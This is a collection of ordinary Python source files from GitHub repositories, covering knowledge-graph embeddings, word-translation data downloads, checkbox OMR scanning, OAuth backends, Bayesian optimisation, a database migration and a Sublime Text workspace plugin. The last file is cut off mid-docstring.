+{"seq_id":"35819743853","text":"from AugmentedKGE.Models.TransE import TransE\nimport torch\n\n\nclass KelpieTransE(TransE):\n\n def __init__(self, ent_total, rel_total, dim, norm=2):\n print(f\"Dim given: {dim}\")\n super(KelpieTransE, self).__init__(ent_total, rel_total, dim)\n\n def load_kelpie_model(self, id_to_entity, id_to_relation):\n \"\"\"\n Loads embeddings from Kelpie implementation of TransE to aKGE implementation of TransE\n\n Parameters:\n id_to_entity (Dict): Mapping from aKGE dataset entity id to kelpie embedding\n id_to_relation (Dict): Mapping from aKGE dataset relation id to kelpie embedding\n \"\"\"\n\n entity_embedding = torch.rand(self.ent_tot, self.dim)\n relation_embedding = torch.rand(self.rel_tot, self.dim)\n\n print(f\"Shape of entity embedding: {entity_embedding.shape}\")\n print(f\"Length of id to entity: {len(id_to_entity)}\")\n print(f\"Dimension 2 of id_to_entity: {len(id_to_entity[0])}\")\n for i in range(0, self.ent_tot):\n entity_embedding[i, :] = id_to_entity[i]\n\n for i in range(0, self.rel_tot):\n relation_embedding[i, :] = id_to_relation[i]\n\n self.embeddings[\"entity\"][\"e\"].emb.data = entity_embedding\n self.embeddings[\"relation\"][\"r\"].emb.data = relation_embedding\n\n def test_kelpie_load(self, id_to_entity, id_to_relation):\n\n flag_entity = True\n flag_relation = True\n\n for i in range(self.ent_tot):\n if not torch.equal(id_to_entity[i], self.embeddings[\"entity\"][\"e\"].emb.data[i, :]):\n flag_entity = False\n break\n\n for i in range(self.rel_tot):\n if not torch.equal(id_to_relation[i], self.embeddings[\"relation\"][\"r\"].emb.data[i, :]):\n flag_relation = False\n break\n\n print (\"Entity load successful:\", flag_entity)\n print(\"Relation load successful:\", flag_relation)","repo_name":"nari97/WWW_modelagnostic","sub_path":"Kelpie/aKGEImplementations/KelpieTransE.py","file_name":"KelpieTransE.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
+{"seq_id":"6931659086","text":"# -*- coding: utf-8 -*-\nimport platform\nimport wget\nimport requests\nimport os\nimport pickle\nfrom zipfile import ZipFile\nfrom os.path import expanduser\n\n\ndef get_savedir(savedir=None):\n if savedir:\n os.makedirs(savedir, exist_ok=True)\n return savedir\n\n pf = platform.system()\n if pf == \"Windows\":\n savedir = \"C:\\word2word\"\n else:\n homedir = expanduser(\"~\")\n savedir = os.path.join(homedir, \".word2word\")\n\n if not os.path.exists(savedir):\n os.makedirs(savedir, exist_ok=True)\n return savedir\n\n\ndef exists(path):\n r = requests.head(path)\n return r.status_code == requests.codes.ok\n\n\ndef get_download_url(lang1, lang2):\n filepath = os.path.dirname(os.path.abspath(__file__)) + '/supporting_languages.txt'\n for line in open(filepath, 'r'):\n l1, l2 = line.strip().split(\"-\")\n if lang1 == l1 and lang2 == l2:\n return f\"https://mk.kakaocdn.net/dn/kakaobrain/word2word/{lang1}-{lang2}.pkl\"\n raise Exception(f\"Language pair {lang1}-{lang2} is not supported.\")\n\n\ndef download_or_load(lang1, lang2, custom_savedir):\n savedir = get_savedir(savedir=custom_savedir)\n fpath = os.path.join(savedir, f\"{lang1}-{lang2}.pkl\")\n if not os.path.exists(fpath):\n # download from cloud\n url = get_download_url(lang1, lang2)\n if url is None:\n raise ValueError(f\"Dataset not found for {lang1}-{lang2}.\")\n\n if not exists(url):\n raise ValueError(\"Sorry. There seems to be a problem with cloud access.\")\n\n print(\"Downloading data ...\")\n wget.download(url, fpath)\n word2x, y2word, x2ys = pickle.load(open(fpath, 'rb'))\n return word2x, y2word, x2ys\n\n\ndef download_os2018(lang1, lang2):\n \"\"\"Download corpora from OpenSubtitles2018.\n\n :return (lang1_file, lang2_file)\n \"\"\"\n datadir = \"data\"\n filepref = f\"OpenSubtitles.{lang1}-{lang2}\"\n if all(os.path.exists(os.path.join(datadir, f\"{filepref}.{lang}\"))\n for lang in [lang1, lang2]):\n print(f\"Found existing {filepref} files. loading...\")\n else:\n # Download and unzip parallel corpus\n url = f\"http://opus.nlpl.eu/download.php?f=OpenSubtitles/v2018/moses/{lang1}-{lang2}.txt.zip\"\n zipname = os.path.join(datadir, f\"{lang1}-{lang2}.txt.zip\")\n print(f\"Downloading {filepref}...\")\n wget.download(url, zipname)\n with ZipFile(zipname) as zf:\n for fname in zf.namelist():\n if fname.startswith(filepref):\n zf.extract(fname, datadir)\n os.remove(zipname)\n lang1_file, lang2_file = [\n os.path.abspath(os.path.join(datadir, f\"{filepref}.{lang}\"))\n for lang in [lang1, lang2]\n ]\n return lang1_file, lang2_file\n","repo_name":"kakaobrain/word2word","sub_path":"word2word/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2746,"program_lang":"python","lang":"en","doc_type":"code","stars":346,"dataset":"github-code","pt":"94"}
+{"seq_id":"71482639988","text":"#!/usr/bin/env python3\n\nimport argparse\nimport sys\nimport re\n\nfrom PIL import Image, ImageDraw, ImageOps\nfrom skimage.filters import threshold_local\nfrom enum import Enum\nimport numpy as np\nimport scipy as sp\nimport scipy.ndimage\nimport lxml.etree\n\n\n# tuned for 300 dpi grayscale text\nBLACK_LEVEL = 0.5 * 255\nFILL_THR = 0.11 # threshold for filled box\nCHECK_THR = 0.04 # threshold for checked box\nEMPTY_THR = 0.02 # threashold for empty box\n\n# H/V line rejection\nCLEAN_LEN = 47 # window length (must be odd)\nCLEAN_W = 3 # line width-1 (even)\nCLEAN_THR = 0.9 # rejection threshold\n\n# Enum for checkbox state\nclass Checkbox_State(Enum):\n Unknown = -1\n Empty = 0\n Checked = 1\n Filled = 2\n\ndef load_image(path):\n image = Image.open(path)\n image = image.convert('L')\n image = ImageOps.autocontrast(image)\n return np.array(image)\n\ndef _svg_translate(tag, tx=0, ty=0):\n if tag is None:\n return tx, ty\n trn = tag.get('transform')\n if trn is not None:\n grp = re.match(r'^translate\\(([-\\d.]+),([-\\d.]+)\\)$', trn)\n if grp is None:\n logging.error('SVG node contains unsupported transformations!')\n sys.exit(1)\n tx += float(grp.group(1))\n ty += float(grp.group(2))\n return _svg_translate(tag.getparent(), tx, ty)\n\ndef load_svg_rects(path, shape):\n data = lxml.etree.parse(path).getroot()\n dw = shape[1] / float(data.get('width'))\n dh = shape[0] / float(data.get('height'))\n rects = []\n for tag in data.iterfind('.//{*}rect'):\n tx, ty = _svg_translate(tag)\n i = tag.get('id')\n x = int((float(tag.get('x')) + tx) * dw)\n y = int((float(tag.get('y')) + ty) * dh)\n w = int(float(tag.get('width')) * dw)\n h = int(float(tag.get('height')) * dh)\n rects.append((i, x, y, w, h))\n return rects\n\n\ndef clean_image(image):\n T = threshold_local(image, 11, offset=10, method=\"gaussian\")\n clean = (image > T).astype(\"uint8\")*255\n return clean\n\n\ndef scan_marks(image, marks):\n res = []\n for i, x, y, w, h in marks:\n # roi = image[y:y+h, x:x+w]\n # scr = (roi < BLACK_LEVEL).sum() / (w*h)\n roi = image[y:y+h, x:x+w] < BLACK_LEVEL\n masked = roi[1:-1,1:-1] & roi[:-2,1:-1] & roi[2:,1:-1] & roi[1:-1,:-2] & roi[1:-1,2:]\n scr = (masked).sum() / (w*h)\n if scr > FILL_THR:\n v = Checkbox_State.Filled\n elif scr > CHECK_THR:\n v = Checkbox_State.Checked\n elif scr < EMPTY_THR:\n v = Checkbox_State.Empty\n else:\n v = Checkbox_State.Unknown\n res.append((i, v, scr))\n return res\n\n\ndef debug_marks(path, image, clean, marks, res):\n buf = Image.new('RGB', image.shape[::-1])\n buf.paste(Image.fromarray(image, 'L'))\n draw = ImageDraw.Draw(buf, 'RGBA')\n for mark, row in zip(marks, res):\n i, x, y, w, h = mark\n v = row[1]\n if v == Checkbox_State.Checked:\n c = (0, 255, 0, 127) # green\n elif v == Checkbox_State.Empty:\n c = (255, 0, 0, 127) # red\n elif v == Checkbox_State.Filled:\n c = (0, 0, 0, 64) # gray\n else:\n c = (255, 127, 0, 127) # orange\n draw.rectangle((x, y, x+w, y+h), c)\n bw = clean.copy()\n thr = bw < BLACK_LEVEL\n bw[thr] = 255\n bw[~thr] = 0\n buf.paste((0, 127, 255),\n (0, 0, image.shape[1], image.shape[0]),\n Image.fromarray(bw, 'L'))\n buf.save(path)\n\ndef print_mark_output(res, path):\n headers = [(\"Checkbox ID\", \"OMR Outcome\", \"Score\"), (\"-----------\", \"-----------\", \"-----\")]\n output = [(i, Checkbox_State(v).name, str(s)) for i, v, s in res]\n lines = headers + output\n col_width = max(len(word) for line in lines for word in line)\n with open(path,'w') as f:\n for line in lines:\n formatted_line = \"\\t\".join(word.ljust(col_width) for word in line)\n f.write(formatted_line + \"\\n\")\n print(formatted_line)\n\ndef main():\n ap = argparse.ArgumentParser()\n ap.add_argument('template', help='Data template (svg)')\n ap.add_argument('image', help='Image to analyze')\n ap.add_argument('text', help='Text output to file')\n ap.add_argument('-d', dest='debug', help='Debug marks to file')\n args = ap.parse_args()\n\n # load data\n image = load_image(args.image)\n marks = load_svg_rects(args.template, image.shape)\n if len(marks) == 0:\n logging.warn('template contains no marks')\n return 1\n\n # process\n clean = clean_image(image)\n res = scan_marks(clean, marks)\n if args.debug:\n debug_marks(args.debug, image, clean, marks, res)\n\n # output\n print_mark_output(res, args.text)\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"eellison/digitize-mtc","sub_path":"scripts/simpleomr.py","file_name":"simpleomr.py","file_ext":"py","file_size_in_byte":4753,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"}
+{"seq_id":"43828231703","text":"#User function Template for python3\n\nclass Solution:\n def beautySum(self, s):\n ans = 0\n \n for i in range(len(s)):\n d = {}\n \n for j in range(i, len(s)):\n if s[j] in d:\n d[s[j]] += 1\n else:\n d[s[j]] = 1\n \n mf = max(d.values())\n lf = min(d.values())\n ans += (mf - lf)\n \n return ans\n\n\n#{ \n # Driver Code Starts\n#Initial Template for Python 3\n\nif __name__ == '__main__':\n t = int(input())\n for _ in range(t):\n s = input()\n ob = Solution()\n print(ob.beautySum(s))\n# } Driver Code Ends","repo_name":"Rubal0990/GFG-DSA","sub_path":"Sum of Beauty of All Substrings - GFG/sum-of-beauty-of-all-substrings.py","file_name":"sum-of-beauty-of-all-substrings.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"}
+{"seq_id":"8602687004","text":"\"\"\"\nYandex OpenID and OAuth2 support.\n\nThis contribution adds support for Yandex.ru OpenID service in the form\nopenid.yandex.ru/user. Username is retrieved from the identity url.\n\nIf username is not specified, OpenID 2.0 url used for authentication.\n\"\"\"\nimport json\nfrom urllib import urlencode\nfrom urlparse import urlparse, urlsplit\n\nfrom social.backends.open_id import OpenIdAuth\nfrom social.backends.oauth import BaseOAuth2, OAuthAuth\n\n\nclass YandexOpenId(OpenIdAuth):\n \"\"\"Yandex OpenID authentication backend\"\"\"\n name = 'yandex-openid'\n URL = 'http://openid.yandex.ru'\n\n def get_user_id(self, details, response):\n return details['email'] or response.identity_url\n\n def get_user_details(self, response):\n \"\"\"Generate username from identity url\"\"\"\n values = super(YandexOpenId, self).get_user_details(response)\n values['username'] = values.get('username') or\\\n urlsplit(response.identity_url)\\\n .path.strip('/')\n values['email'] = values.get('email', '')\n return values\n\n\nclass YandexOAuth(OAuthAuth):\n \"\"\"Yandex OAuth authentication backend\"\"\"\n name = 'yandex-oauth'\n AUTHORIZATION_URL = 'https://oauth.yandex.ru/authorize'\n ACCESS_TOKEN_URL = 'https://oauth.yandex.ru/token'\n REDIRECT_STATE = False\n EXTRA_DATA = [\n ('id', 'id'),\n ('expires', 'expires')\n ]\n\n def get_user_details(self, response):\n return get_user_details(response)\n\n def user_data(self, access_token, response, *args, **kwargs):\n url = 'https://api-yaru.yandex.ru/me/'\n return user_data(self, url, access_token, response, *args, **kwargs)\n\n\nclass YandexOAuth2(BaseOAuth2):\n \"\"\"Legacy Yandex OAuth2 authentication backend\"\"\"\n name = 'yandex-oauth2'\n AUTHORIZATION_URL = 'https://oauth.yandex.com/authorize'\n ACCESS_TOKEN_URL = 'https://oauth.yandex.com/token'\n REDIRECT_STATE = False\n\n def get_user_details(self, response):\n return get_user_details(response)\n\n def user_data(self, access_token, response, *args, **kwargs):\n url = self.setting('API_URL')\n reply = user_data(self, url, access_token, response, *args, **kwargs)\n if reply:\n if isinstance(reply, list) and len(reply) >= 1:\n reply = reply[0]\n if 'links' in reply:\n userpic = reply['links'].get('avatar')\n elif 'avatar' in reply:\n userpic = reply['avatar'].get('Portrait')\n else:\n userpic = ''\n reply.update({'id': reply['id'].split(\"/\")[-1],\n 'access_token': access_token,\n 'userpic': userpic})\n return reply\n\n\ndef get_user_details(response):\n \"\"\"Return user details from Yandex account\"\"\"\n name = response['name']\n last_name = ''\n\n if ' ' in name:\n names = name.split(' ')\n last_name = names[0]\n first_name = names[1]\n else:\n first_name = name\n\n try:\n host = urlparse(response.get('links').get('www')).hostname\n username = host.split('.')[0]\n except (IndexError, AttributeError):\n username = name.replace(' ', '')\n\n return {\n 'username': username,\n 'email': response.get('email', ''),\n 'first_name': first_name,\n 'last_name': last_name,\n }\n\n\ndef user_data(backend, url, access_token, response, *args, **kwargs):\n \"\"\"Loads user data from service\"\"\"\n url = url + '?' + urlencode({\n 'oauth_token': access_token,\n 'format': 'json',\n 'text': 1\n })\n try:\n return json.load(backend.urlopen(url))\n except (ValueError, IndexError):\n return None\n","repo_name":"klinkin/python-social-auth","sub_path":"social/backends/yandex.py","file_name":"yandex.py","file_ext":"py","file_size_in_byte":3726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"94"}
+{"seq_id":"25319546745","text":"import numpy as np\nfrom tfbo.optimizers.optimizer_class import optimizer\nfrom tfbo.models.square_distances import square_dists_np\nfrom tfbo.components.initializations import initialize_models, initialize_acquisition\nimport gpflow\nfrom tfbo.utils.import_modules import import_attr\n\n\nclass manual_bo_optimizer(optimizer):\n def __init__(self, xy_start, proj_dim, objective, loss, **kwargs):\n super().__init__(xy_start, proj_dim, objective, loss)\n self.decomposition = [np.arange(start=i * self.proj_dim, stop=(i+1) * self.proj_dim) for i in\n range(int(np.floor(self.input_dim/self.proj_dim)))]\n self.lipschitz_const = self.objective.lipschitz_const # 1e01 # check with bin_size\n self.initialize_normalization()\n self.log_lik_opt = []\n self.hyps_opt = []\n\n def remove_inconsistencies(self, _x, _y):\n indices_opt = list(range(len(self.decomposition)))\n select_component_i = lambda index_j: np.copy(_x[:, self.decomposition[index_j]])\n Xselected = list(map(select_component_i, indices_opt))\n\n euclidean_dists2y = square_dists_np(_y, _y)\n def select_consistent(Xselected_i):\n euclidean_dists2x = square_dists_np(Xselected_i, Xselected_i) # double check with tf implementation\n indices_cons_i = self.select_data_indices(euclidean_dists2x, euclidean_dists2y, _y)\n return np.copy(Xselected_i[indices_cons_i, :]), np.copy(_y[indices_cons_i, :])\n XY_cons = list(map(select_consistent, Xselected))\n _Xcons = [XY_cons_i[0] for XY_cons_i in XY_cons]\n _Ycons = [XY_cons_i[1] for XY_cons_i in XY_cons]\n return _Xcons, _Ycons\n\n def select_data_indices(self, square_dists_x, square_dists_y, _y):\n assert np.max(np.abs(np.diag(square_dists_x) - np.diag(square_dists_y))) < 1e-12\n Lp = np.sqrt(square_dists_y) > self.lipschitz_const * np.sqrt(square_dists_x) # violate lipschitz continuity -> 1 = inconsistencies\n i_triangle, j_triangle = np.triu_indices(n=square_dists_x.shape[0], k=1) # collect upper triangular indices\n\n Lp_triang = np.copy(Lp[i_triangle, j_triangle])\n\n if np.any(Lp_triang):\n i_triangle_true = np.copy(i_triangle[Lp_triang])[:, None]\n j_triangle_true = np.copy(j_triangle[Lp_triang])[:, None]\n indices_pairs_inc = np.concatenate([i_triangle_true, j_triangle_true], axis=1) # i,j indices of inconsistent pairs\n\n pw_max = lambda ij: self.select_max(ind_ij=ij, _Y=_y)\n indices_to_remove_list = list(np.ravel(list(map(pw_max, list(indices_pairs_inc)))))\n consistent_selection = np.ones(shape=square_dists_x.shape[0], dtype=bool)\n if indices_to_remove_list: # empty sequences are false, if nonempty\n indices_to_remove_norep = list(set(indices_to_remove_list)) # self.remove_reps(indices_to_remove_list) remove repeated indices in list\n consistent_selection[indices_to_remove_norep] = False # !indices_to_remove_norep have lost order!\n else:\n consistent_selection = np.ones(shape=square_dists_x.shape[0], dtype=bool)\n return consistent_selection\n\n def remove_reps(self, indices_list):\n bag_of_indices = np.copy(np.array([indices_list[0]]))[:, None] # why [0]\n for i in range(len(indices_list) - 1):\n index_new = indices_list[i+1]\n if all([index_i != index_new for index_i in list(bag_of_indices)]):\n bag_of_indices = np.concatenate([bag_of_indices, np.copy(np.array([index_new]))[:, None]], axis=0)\n i += int(1)\n return bag_of_indices\n\n def select_max(self, ind_ij, _Y):\n # _Y = self.data_y\n if _Y[ind_ij[0]] >= _Y[ind_ij[1]]:\n return np.array([np.copy(ind_ij[0])])\n else:\n return np.array([np.copy(ind_ij[1])])\n\n def initialize_single_model(self, x_consist_i, y_consist_i):\n kernel_out, model_out = initialize_models(x=np.copy(x_consist_i), y=np.copy(y_consist_i),\n input_dim=self.proj_dim, model='GPR', kernel='Matern52', ARD=True)\n return kernel_out, model_out\n\n def compose_x(self, x_list):\n x0 = np.zeros(shape=[x_list[0].shape[0], self.proj_dim * len(x_list)]) # check shapes of x_i\n for x_i, indices_i in zip(x_list, self.decomposition):\n x0[:, indices_i] = x_i # if I change x_i changes x0?\n return x0\n\n def evaluate(self, x_list):\n x_tp1 = self.compose_x(x_list) # check shape\n y_tp1 = self.objective.f(x_tp1, noisy=True, fulldim=False)\n return y_tp1\n\n def fit_gp(self, gp):\n self.hyps_opt = []\n signal_variance = np.random.uniform(low=0., high=10, size=10)[:, None]\n noise_variance = signal_variance * 0.01\n log_lik = []\n for signal_i, noise_i in zip(list(signal_variance), list(noise_variance)):\n gp = self.reset_hyps(gp)\n gp.kern.variance = signal_i[0]\n gp.likelihood.variance = noise_i[0]\n try:\n gpflow.train.ScipyOptimizer().minimize(gp)\n except:\n gp = self.reset_hyps(gp)\n log_lik.append(gp.compute_log_likelihood())\n self.hyps_opt.append(self.get_hyps(gp))\n\n np_log_liks = np.array(log_lik)\n index_opt = np.argmax(np_log_liks)\n gp = self.assign_hyps(gp, self.hyps_opt[index_opt])\n self.log_lik_opt.append(np_log_liks[index_opt])\n return gp\n\n def optimize_ith_model(self, gp_i, i, opt_config):\n # gp_i = self.reset_hyps(gp_i)\n gp_i = self.fit_gp(gp_i)\n # try:\n # gpflow.train.ScipyOptimizer().minimize(gp_i)\n # except:\n # gp_i = self.reset_hyps(gp_i)\n self.hyps.append(self.get_hyps(gp_i))\n\n kwargs = {'ymin': self.Ynorm.min()}\n acquisition = initialize_acquisition(self.loss, gp_i, **kwargs)\n acquisition_norm = lambda x: \\\n self.acquisition_norm(acquisition=acquisition, x=x,\n X_proj_mean=np.copy(self.X_mean[:, self.decomposition[i]]),\n X_proj_std=np.copy(self.X_std[:, self.decomposition[i]]))\n x_opt, acq_opt = self.minimize_acquisition(acquisition_norm, opt_config)\n return x_opt, acq_opt\n\n def update_data(self, xnew, ynew):\n self.data_x = np.concatenate([self.data_x, xnew], axis=0)\n self.data_y = np.concatenate([self.data_y, ynew], axis=0)\n self.initialize_normalization()\n\n def update_models(self, list_gp, list_x, list_y):\n for gp_i, x_i, y_i in zip(list_gp, list_x, list_y):\n gp_i.X = np.copy(x_i)\n gp_i.Y = np.copy(y_i)\n return list_gp\n\n def run(self, maxiters):\n # Normalization -> decomposition -> initialization/update of each GP model\n list_Xnorm_cons, list_Ynorm_cons = self.remove_inconsistencies(_x=np.copy(self.Xnorm), _y=np.copy(self.Ynorm))\n list_km_out = list(map(self.initialize_single_model, list_Xnorm_cons, list_Ynorm_cons))\n # list_kernels = [km_i[0] for km_i in list_km_out]\n list_gpmodels = [km_i[1] for km_i in list_km_out]\n opt_config = import_attr('tfbo/configurations', attribute='acquisition_opt')\n opt_config['bounds'] = [(0., 1.)] * self.proj_dim * self.num_init\n\n list_components = list(range(len(self.decomposition)))\n optimize_i = lambda gp_i, i: self.optimize_ith_model(gp_i, i, opt_config)\n\n for j in range(maxiters):\n print(j)\n\n list_xa = list(map(optimize_i, list_gpmodels, list_components)) # check double input\n\n list_x = [xa_i[0] for xa_i in list_xa]\n x_out = self.compose_x(list_x)\n y_out = self.evaluate(list_x)\n self.update_data(xnew=x_out, ynew=y_out) # augment dataset and normalize\n list_Xnorm_cons, list_Ynorm_cons = self.remove_inconsistencies(_x=np.copy(self.Xnorm), _y=np.copy(self.Ynorm)) # decompose and prune\n self.reset_graph()\n list_km_out = list(map(self.initialize_single_model, list_Xnorm_cons, list_Ynorm_cons))\n list_gpmodels = [km_i[1] for km_i in list_km_out]\n # list_gpmodels = self.update_models(list_gp=list_gpmodels, list_x=list_Xnorm_cons, list_y=list_Ynorm_cons)\n return self.data_x, self.data_y, self.hyps, self.log_lik_opt","repo_name":"rm4216/BayesOpt","sub_path":"tfbo/optimizers/manual_bo_optimizer.py","file_name":"manual_bo_optimizer.py","file_ext":"py","file_size_in_byte":8456,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"94"}
+{"seq_id":"21401206744","text":"\"\"\"Adds modified to PureApiPub pk.\n\nRevision ID: c1dc63b64dd8\nRevises: e1ff947af0c9\nCreate Date: 2018-05-28 14:58:59.433055\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import oracle\n\n# revision identifiers, used by Alembic.\nrevision = 'c1dc63b64dd8'\ndown_revision = 'e1ff947af0c9'\nbranch_labels = None\ndepends_on = None\n\ndef upgrade():\n op.drop_constraint(\n 'SYS_C00492426',\n 'pure_api_pub',\n type_='primary'\n )\n op.create_primary_key(\n 'SYS_C00492426',\n 'pure_api_pub',\n ['uuid','modified']\n )\n\ndef downgrade():\n op.drop_constraint(\n 'SYS_C00492426',\n 'pure_api_pub',\n type_='primary'\n )\n op.create_primary_key(\n 'SYS_C00492426',\n 'pure_api_pub',\n ['uuid']\n )\n","repo_name":"UMNLibraries/experts_dw","sub_path":"alembic/versions/c1dc63b64dd8_adds_modified_to_pureapipub_pk.py","file_name":"c1dc63b64dd8_adds_modified_to_pureapipub_pk.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"}
+{"seq_id":"33323596097","text":"#!/usr/bin/env python\n\n\"\"\"A sublime-text plugin for saving and loading easy workspaces\n\nThis module contains code for the sublime-text plugin EasyWorkspace.\n\nEasyWorkspace aims to provide an easier way for saving and loading workspaces\nin sublime-text. The native sublime-text workspace functionality, while useful in\nsome situations, has a few drawbacks that this plugin wishes to alleviate.\n\nParticularly, EasyWorkspace provides the following features:\n\n 1. Save and Load your current workspace!\n - save your window folders, layout, and views with a quick key command!\n\n 2. No need for a sublime project!\n - While native sublime-workspace support requires you to be working\n within a sublime-project, EasyWorkspace does not!\n\n 2. Simpler Files\n - An EasyWorkspace workspace file only contains a window layout and a series\n of views within each. That's it!\n\n\"\"\"\n\n################################################################################\n# Imports\n\nimport sublime\nimport sublime_plugin\n\nimport os\nimport datetime\nimport time\n\n################################################################################\n# Workspace Data\n################################################################################\n\nclass EasyWorkspace:\n \"\"\" represents an easy workspace \"\"\"\n\n def __init__(self):\n self.layout = dict(rows=[0.0, 1.0], cells=[[0, 0, 1, 1]], cols=[0.0, 1.0])\n self.folders = []\n self.active = ()\n self.groups = []\n\n self.filename = \"\"\n\n ############################################################################\n # File IO\n\n def saveToFile(self, filename):\n \"\"\" Saves this workspace to a file\n\n Arguments:\n filename -- the workspace file to write\n\n Returns: true if file was saved, false otherwise\n \"\"\"\n\n # ensure path exists\n fileDir = os.path.dirname(filename)\n if not os.path.isdir(fileDir):\n os.makedirs(fileDir)\n\n # write the file\n with open(filename, 'w') as f:\n wsJSON = sublime.encode_value(vars(self), True)\n f.write(wsJSON)\n\n self.filename = filename\n\n\n def loadFromFile(self, filename):\n \"\"\" Loads a workspace from a file\n\n Arguments:\n filename -- the workspace file to load\n \"\"\"\n\n # open file\n wsJSON = \"\"\n try:\n with open(filename) as f:\n wsJSON = f.read()\n self.buildFromJSON(sublime.decode_value(wsJSON))\n\n except FileNotFoundError:\n sublime.status_message(\"File {} does not exist. Opening as New Workspace.\".format(filename))\n\n self.filename = filename\n\n\n ############################################################################\n # Operations\n\n def buildFromWindow(self, window):\n \"\"\" Populates this workspace data from a sublime-text window\n\n Arguments:\n window -- the window to populate from\n \"\"\"\n\n # save the layout\n self.layout = window.layout()\n self.folders = window.folders()\n self.active = window.get_view_index(window.active_view())\n\n # iterate over all groups\n for i in range(window.num_groups()):\n sViews = window.views_in_group(i)\n activeSView = window.active_view_in_group(i)\n\n # create the group\n group = dict()\n group['active'] = sViews.index(activeSView) if sViews else 0\n group['views'] = []\n\n # fill with views\n for sView in sViews:\n # ignore any temporary or unsaved views\n fileExistsOnDisk = sView.file_name()\n if not fileExistsOnDisk:\n continue\n\n view = dict()\n\n view['file'] = sView.file_name()\n view['visible'] = (sView.visible_region().a, sView.visible_region().b)\n view['selection'] = (sView.sel()[0].a, sView.sel()[0].b)\n view['read_only'] = sView.is_read_only()\n\n group['views'].append(view)\n\n self.groups.append(group)\n\n def applyToWindow(self, window):\n \"\"\" Opens this workspace in the provided sublime-text window\n\n Arguments:\n window - window in which to open the easy workspace (will close existing files)\n \"\"\"\n settings = sublime.load_settings(\"EasyWorkspace.sublime-settings\")\n\n # make sure the window is empty\n window.run_command(\"close_all\")\n window.run_command(\"close_folder_list\")\n\n # open layout\n window.set_layout(self.layout)\n\n # open folders\n for folder in self.folders:\n self.__openFolderInWindow(window, folder)\n\n # open views\n for i, group in enumerate(self.groups):\n for j, view in enumerate(group['views']):\n\n # open the file and set group properly\n sView = window.open_file(view['file'])\n window.set_view_index(sView, i, j)\n\n # add slight delay to ensure view is fully opened\n # and ready to have 'visible'/'selection' modified\n time.sleep(0.05)\n\n # set view attributes, region and selection\n sView.set_read_only(view.get('read_only', False))\n\n # when setting the visible region, we want the top of the\n # view to match saved workspace. We achieve this by showing\n # bottom, then top of view region.\n if settings.get(\"easy_ws_read_view_region\", False):\n r = sublime.Region(*view['visible'])\n sView.show(r.end(), False)\n sView.show(r.begin(), False)\n\n if settings.get(\"easy_ws_read_view_selection\", False):\n sView.sel().add(sublime.Region(*view['selection']))\n\n # set active views per group\n\n for i, group in enumerate(self.groups):\n if group['active']:\n window.focus_view(window.views_in_group(i)[group['active']])\n if self.active:\n window.focus_group(self.active[0])\n\n # all done\n\n sublime.status_message(\"Opened \" + self.filename)\n\n def buildFromJSON(self, json):\n \"\"\" Constructs a workspace from a provided JSON string\n\n Arguments:\n json -- the JSON string representation of a workspace\n \"\"\"\n self.layout = json['layout']\n self.folders = json['folders']\n self.active = json['active']\n self.groups = json['groups']\n\n return self\n\n ############################################################################\n\n def __openFolderInWindow(self, window, folder):\n \"\"\" opens a folder in the provided sublime text window\n\n Arguments:\n window - where the folder should be opened\n folder - the folder path to open\n \"\"\"\n if not (window and folder and os.path.isdir(folder)):\n return\n\n # get current folders list\n project_data = window.project_data() if window.project_data() else {'folders': []}\n folder = os.path.normpath(folder)\n\n # check if it already exists\n for f in project_data['folders']:\n if f['path'] and folder == f['path']:\n return # already exists\n\n # create folder data\n folder_struct = { 'path': folder, 'follow_symlinks': True }\n\n # add folder data to window\n project_data['folders'].append(folder_struct)\n window.set_project_data(project_data)\n\n\n################################################################################\n# Plugin Commands\n################################################################################\n\nclass EasyWorkspaceCommand:\n \"\"\" An interface for easy workspace commands \"\"\"\n\n # shared dictionary which stores the currently open workspace file for each\n # open window in sublime\n _openWorkspaceFiles = dict()\n\n # store the last workspace to reopen as needed\n _reopenWorkspace = \"\"\n\n def run(self, **kwargs):\n \"\"\" runs a command and garbage collects openWorkspaceFiles \"\"\"\n self.__garbageCollectOpenWorkspaceFiles()\n\n ############################################################################\n\n def __garbageCollectOpenWorkspaceFiles(self):\n \"\"\" removes all closed window ids from our shared state data \"\"\"\n openIds = [window.id() for window in sublime.windows()]\n invalidIds = [wid for wid in self._openWorkspaceFiles if wid not in openIds]\n for wid in invalidIds:\n del self._openWorkspaceFiles[wid]\n\n\n ############################################################################\n\n def getWorkspacesDir(self):\n \"\"\" returns the EasyWorkspace workspaces directory from settings \"\"\"\n settings = sublime.load_settings(\"EasyWorkspace.sublime-settings\")\n wsFolder = settings.get(\"easy_ws_save_directory\", \"EasyWorkspace/workspaces\")\n return os.path.join(sublime.packages_path(), wsFolder + os.path.sep)\n\n def getWorkspaceFilepath(self, filename):\n \"\"\" Resolves a filename into its full easyworkspace path,\n including directory and extension\n\n Arguments:\n filename - the filename to resolve as full workspace file\n \"\"\"\n settings = sublime.load_settings(\"EasyWorkspace.sublime-settings\")\n\n workspacesDir = self.getWorkspacesDir()\n baseName, extension = os.path.splitext(filename)\n if not extension:\n extension = settings.get('easy_ws_file_extension', '.ws')\n return os.path.join(workspacesDir, baseName+extension)\n\n def getAllWorkspaceFiles(self):\n \"\"\" returns a list of all easy workspace files \"\"\"\n workspacesDir = self.getWorkspacesDir()\n workspaceFiles = []\n for root, dirs, files in os.walk(workspacesDir):\n for file in files:\n # ignore any hidden files\n if file.startswith('.'):\n continue\n\n # trim base workspace directory for display\n subdir = root[len(workspacesDir):]\n workspaceFiles.append(os.path.join(subdir, file))\n\n return workspaceFiles\n\n################################################################################\n\nclass SaveEasyWorkspaceCommand(EasyWorkspaceCommand, sublime_plugin.WindowCommand):\n \"\"\" A sublime window command which saves an easy workspace \"\"\"\n\n def run(self, **kwargs):\n \"\"\" Save this window's workspace\n\n Keyword 